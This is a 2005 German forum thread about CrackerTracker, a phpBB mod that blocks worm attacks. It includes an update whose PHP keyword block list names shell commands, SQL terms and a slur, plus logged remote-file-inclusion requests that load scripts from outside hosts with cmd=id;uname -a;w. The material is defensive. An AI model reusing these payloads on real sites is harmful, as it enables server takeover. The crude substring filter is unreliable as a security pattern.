CBACK CrackerTracker Worm Protector

Beitrag von **skittles** » Mo 28.Mär, 2005 20:14

Eine Frage zu dem Mod:

Macht es Sinn, die Code Teile auch in anderen Pages einzubauen?
also von anderen Mods meine ich!

Beitrag von **oxpus** » Mo 28.Mär, 2005 20:31

Sicher, wenn Du bedarf hast, diese extra zu schützen.
Nur sind die Hauptziele immer noch die viewtopic.php und viewforum.php.

Beitrag von **skittles** » Mo 28.Mär, 2005 20:33

naja der Einbau dauert 30 sekunden, also ich werds schon reintun!
Schaden wirds hoffentlich nicht! *gg*

Beitrag von **oxpus** » Mo 28.Mär, 2005 20:34

Nein, schaden wirds nicht.

Beitrag von **cback** » Sa 09.Apr, 2005 19:10

OK dieser da hat ausgedient. Die Revolution wartet hier:

http://www.community.cback.de/viewtopic ... 2544#32544

NEUE VERSION

Beitrag von **modbo** » Sa 09.Apr, 2005 23:55

Oha. Den hätte Hotschi mal lieber auch installiert ...
http://phpBB.hotschi.de/

hack by iranian haloo group hack by iranian

Beitrag von **oxpus** » So 10.Apr, 2005 11:13

Na Hotschi hat seit Ewigkeiten nichts mehr gemacht.
Und das Board ist noch ein phpBB 2.0.4.
War dan nur eine Frage der Zeit.

Beitrag von **skittles** » Sa 16.Apr, 2005 15:43

"Protected by" Logo unten im Forum.

HeHe! Hätte gar nicht gedacht, dass es diese kleine Logo welches eine Arbeit von nicht mal einer Stunde war, mal so weit bringen würde. *gggg*

Beitrag von **cback** » Sa 16.Apr, 2005 16:58

HeHe! Hätte gar nicht gedacht, dass es diese kleine Logo welches eine Arbeit von nicht mal einer Stunde war, mal so weit bringen würde. *gggg*

Na klar, wenn Du schon mir en Button machst muss der ja auch benutzt werden ne

Beitrag von **skittles** » Sa 16.Apr, 2005 21:53

kannste dafür mal mein Board testen?
Mein Board
Hehe!
Nein scherz beiseite!
Ich hoffe, deine Aktion läuft noch etwas länger!

Beitrag von **cback** » Sa 16.Apr, 2005 22:03

LOL nice try aber mein lokales board heißt phpbb2 oder orion oder krimskrams

Beitrag von **helluvaguy** » Fr 22.Apr, 2005 16:47

Es ist sicherlich eine dumme Frage, aber trotzdem muß ich sie stellen.

Was bringt es mir, wenn ich diese Angaben aus der Logdatei habe? Ich weiß zwar nun zu welchen Zeiten diese Scripte meine Site "angreifen" (was inzwischen mir die ungewöhnlich hohe Zahl an Gästen erklärt). Aber was kann ich insbesondere mit der Angabe "Angriffsversuch" anfangen?

Beitrag von **oxpus** » Fr 22.Apr, 2005 17:12

Ggf. weitere Sicherheitsvorkehrungen treffen, z.B. Schutz per .htaccess.
Oder auch feststellen, von wo (nicht immer aussagekräftig) und vor allem wann die Angriffe laufen.

Beitrag von **volker58** » Fr 22.Apr, 2005 17:39

20.04.2005, 04:41 65.54.188.87 msnbot/1.0 (+http://search.msn.com/msnbot.htm) topic=Auszeichnungen%20in%20Form%20von%20Orden&link=http://dimension.saab-cars.de/viewtopic.php?t=139

warum hat er das geblockt? ist doch nur ein bot, oder seh ich da was falsch?

Beitrag von **cback** » Fr 22.Apr, 2005 17:57

%20in

Beitrag von **helluvaguy** » Sa 23.Apr, 2005 12:24

[quote="oxpus - 4.April 2005, 17:12";p="29401"]Ggf. weitere Sicherheitsvorkehrungen treffen, z.B. Schutz per .htaccess.
Oder auch feststellen, von wo (nicht immer aussagekräftig) und vor allem wann die Angriffe laufen.[/quote] Oxpus, könntest Du das evtl etwas näher ausführen? Selbst wenn ich weiß, von welcher IP ein solcher Angriff kommt, kann ich doch immer noch keine Schlägertruppe losschicken. Welche Schlüsse kann ich daraus ziehen, wenn ich die Zeiten von Angriffen kenne?

Beitrag von **easygo** » Sa 23.Apr, 2005 13:18

[quote="cback - Fr 22.Apr, 2005 17:57";p="29406"]

%20in

[/quote]

LOL ^^ das nenn ich PREVENTIV

Beitrag von **oxpus** » Sa 23.Apr, 2005 21:01

@helluvaguy
http://www.oxpus.de/kb.php?mode=article&k=35

Beitrag von **cback** » Sa 23.Apr, 2005 23:41

LOL ^^ das nenn ich PREVENTIV wink

Naja, das er natürlich in der URL sagt aha da hat der Benutzer was mit gesucht oder oha der Wurm macht nen SQL Injection geht leider ja nicht

Beitrag von **cback** » So 24.Apr, 2005 18:40

UPDATE

Das Komplettpaket wurde ebenfalls auf Version 2.0.1 aktualisiert in meiner Downloadsektion. Alle die den ExtremeEdition 2.0.0 installiert haben können sich mit einem kleinen Update gegen den "Nigga" Worm schützen der ein Loch in der phpBB Styleverwaltung im ACP ausnutzt. Das ACP wird auch vor angriffen geschützt.

Hier das UPdate von 2.0.0 auf 2.0.1:

Code: Alles auswählen

##############################################################
## MOD Title: Update CrackerTracker v2.0.0 to v2.0.1
## MOD Author: CBACK < sonny@cback.de > (Christian Knerr) http://www.community.cback.de
## MOD Description: This updates CrackerTracker Version (2.0.0) to 
##                  the newest V2.0.1 Version (CrackerTracker XTreme 
##                  Edition 2nd Release)
##############################################################
## For Security Purposes, Please Check: http://www.phpbb.com/mods/downloads/ for the
## latest version of this MOD. Downloading this MOD from other sites could cause malicious code
## to enter into your phpBB Forum. As such, phpBB will not offer support for MODs not offered
## in our MOD-Database, located at: http://www.phpbb.com/mods/downloads/
##############################################################
## Before Adding This MOD To Your Forum, You Should Back Up All Files Related To This MOD
##############################################################
#
#-----[ OPEN ]------------------------------------------
#

  common.php


#
#-----[ FIND ]------------------------------------------
#

$wormprotector = array('chr(', 'wget', 'cmd=', 'rush=', 'union', 'UNION', 'echr(', 'esystem(', 'cp%20', 'mdir%20', 'mcd%20', 'mrd%20', 'rm%20', 'mv%20', 'rmdir%20', 'chmod(', 'chmod%20', 'chown%20', 'chgrp%20', 'locate%20', 'grep%20', 'diff%20', 'kill%20', 'kill(', 'killall', 'passwd%20', 'telnet%20', 'vi(', 'vi%20', 'INSERT%20INTO', 'SELECT%20');


#
#-----[ REPLACE WITH ]------------------------------------------
#

$wormprotector = array('chr(', 'wget', 'cmd=', 'rush=', 'union', 'UNION', 'echr(', 'esystem(', 'cp%20', 'mdir%20', 'mcd%20', 'mrd%20', 'rm%20', 'mv%20', 'rmdir%20', 'chmod(', 'chmod%20', 'chown%20', 'chgrp%20', 'locate%20', 'grep%20', 'diff%20', 'kill%20', 'kill(', 'killall', 'passwd%20', 'telnet%20', 'vi(', 'vi%20', 'INSERT%20INTO', 'SELECT%20', 'nigga', 'fopen', 'fwrite', '$_REQUEST', '$_GET');



#
#-----[ FIND ]------------------------------------------
#

$cfilesize = count(file("ctrack.txt"));


#
#-----[ REPLACE WITH ]------------------------------------------
#

$cfilesize = count(file($phpbb_root_path . "ctrack.txt"));



#
#-----[ FIND ]------------------------------------------
#

      if ($cfilesize > 200)  // Maximum entry Number into the Log File
      {
        $clog = fopen("ctrack.txt", "a");


#
#-----[ REPLACE WITH ]------------------------------------------
#

      if ($cfilesize > 200)  // Maximum entry Number into the Log File
      {
        $clog = fopen($phpbb_root_path . "ctrack.txt", "a");


#
#-----[ FIND ]------------------------------------------
#

      else
      {
        $clog = fopen('ctrack.txt', 'a');


#
#-----[ REPLACE WITH ]------------------------------------------
#

      else
      {
        $clog = fopen($phpbb_root_path . 'ctrack.txt', 'a');


#
#-----[ SAVE/CLOSE ALL FILES ]------------------------------------------
#
# EoM
#
# This MOD was created with: CBACK MIRO ModEditor (http://www.community.cback.de)

Beitrag von **oxpus** » So 24.Apr, 2005 19:03

Vielen Dank!
Nun fühlt ich mich schon wieder ein Stück sicherer.
(Hab ja nur noch 4 Updates vor mir...)

Beitrag von **modbo** » So 15.Mai, 2005 00:18

Der erste Wurm seit bestehen des Boards wurde erfolgreich geblockt

Code: Alles auswählen

04.05.2005, 16:58 67.108.84.113 Linux  pic_id=http://www.thecurse.pop.com.br/sh.jpg?&cmd=id;uname%20-a;w

THX @cback !

Beitrag von **oxpus** » So 15.Mai, 2005 10:13

Herzlichen Glückwunsch

Beitrag von **AmigaLink** » Mi 18.Mai, 2005 05:04

CrackerTracker-Log hat geschrieben:/phpbb2/portal.php?page=http://qwqw.altervista.org/tool25.dat?&cmd=id

Beitrag von **oxpus** » Mi 18.Mai, 2005 07:47

Bei Dir?